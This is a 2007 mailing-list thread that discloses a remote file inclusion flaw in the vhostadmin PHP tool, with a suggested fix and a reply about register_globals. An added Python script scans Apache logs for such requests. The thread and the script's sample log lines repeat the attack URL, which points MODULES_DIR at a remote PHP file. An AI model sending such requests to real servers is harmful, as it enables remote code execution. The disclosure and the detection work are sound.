On Jan 29, 2007, at 21:52 , Shane Chrisp wrote:

I know this is not exactly vpopmail related, but as it's a vpopmail
related tool I thought others here would like to be made aware of this.

I have been using vhostadmin for a while now, and have just noticed that
it is vulnerable to an XSS attack which could lead to the underlying
system being cracked. The problem is the $MODULES_DIR var is not being
protected against injection of a remote path and simply accepts whatever
is passed to it such as

http://server/path/to/vhostadmin/modules/main.php?MODULES_DIR=http://remoteserver/path/to/bad/file.php?&cmd=0wn3d


A quick fix is to change global.inc and change
$MODULES_DIR = 'modules';
to
define("MODULES_DIR", "modules");

and then change all references in any file it appears in of

$MODULES_DIR
to
MODULES_DIR

and comment out any references to

global $MODULES_DIR;
to
//global $MODULES_DIR;


There may be other issues, but this one I came across yesterday when I
noticed the above formatted URL in the Apache logs. Also, we have
modified some of the system ourselves, so it is entirely possible that
we may be partly to blame for some or all of this, but it would
certainly be worth watching out for if you are using the system.

Regards
Shane


Or turn off register_globals, and then MODULES_DIR would only exist in $_GET[]. I chalk this one up to a bad PHP configuration:

http://www.php.net/register_globals

While it would not stop attacks that could cause you to include stuff if other variables are not checked before blindly being used from the $_POST and $_GET arrays, the attack you just mentioned is null and void.

If you are running with register_globals on, you should seriously reconsider. It will be deprecated, and I can't wait for it to finally be gone; then script writers will have to learn how to use the arrays that were meant for that sort of data.

Bert JW Regeer
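
A way to look for the kind of request Shane found in the Apache logs, as an added example that is not part of the original thread: it flags any query parameter whose value is a remote URL, including URL-encoded forms. The log entries, addresses, the `index.php?page=` path and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line of an Apache common/combined log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Parameter value that starts with a remote scheme, as in the reported URL.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

# Constructed sample entries (documentation-range addresses, made-up times).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jan/2007:03:14:07 +0000] "GET /vhostadmin/modules/main.php?MODULES_DIR=http://remoteserver/path/to/bad/file.php?&cmd=0wn3d HTTP/1.1" 200 512',
    '198.51.100.7 - - [28/Jan/2007:03:15:41 +0000] "GET /vhostadmin/modules/main.php?MODULES_DIR=http%3A%2F%2Fremoteserver%2Fpath%2Fto%2Fbad%2Ffile.php%3F HTTP/1.1" 200 512',
    '192.0.2.44 - - [28/Jan/2007:09:02:13 +0000] "GET /vhostadmin/index.php?page=domains HTTP/1.1" 200 2048 "http://server/vhostadmin/" "Mozilla/5.0"',
    '192.0.2.44 - - [28/Jan/2007:09:02:20 +0000] "GET /vhostadmin/modules/main.php HTTP/1.1" 200 1024',
]


def remote_params(target):
    """Return [(name, value)] for query parameters whose value is a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        decoded = unquote(value)
        if REMOTE_VALUE_RE.match(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines):
    """Yield (client_ip, path, name, value) for each suspicious parameter."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        for name, value in remote_params(target):
            yield line.split(" ", 1)[0], urlsplit(target).path, name, value


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

A match shows that the request was made, not that the include took effect; as the reply notes, that depends on register_globals being on.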
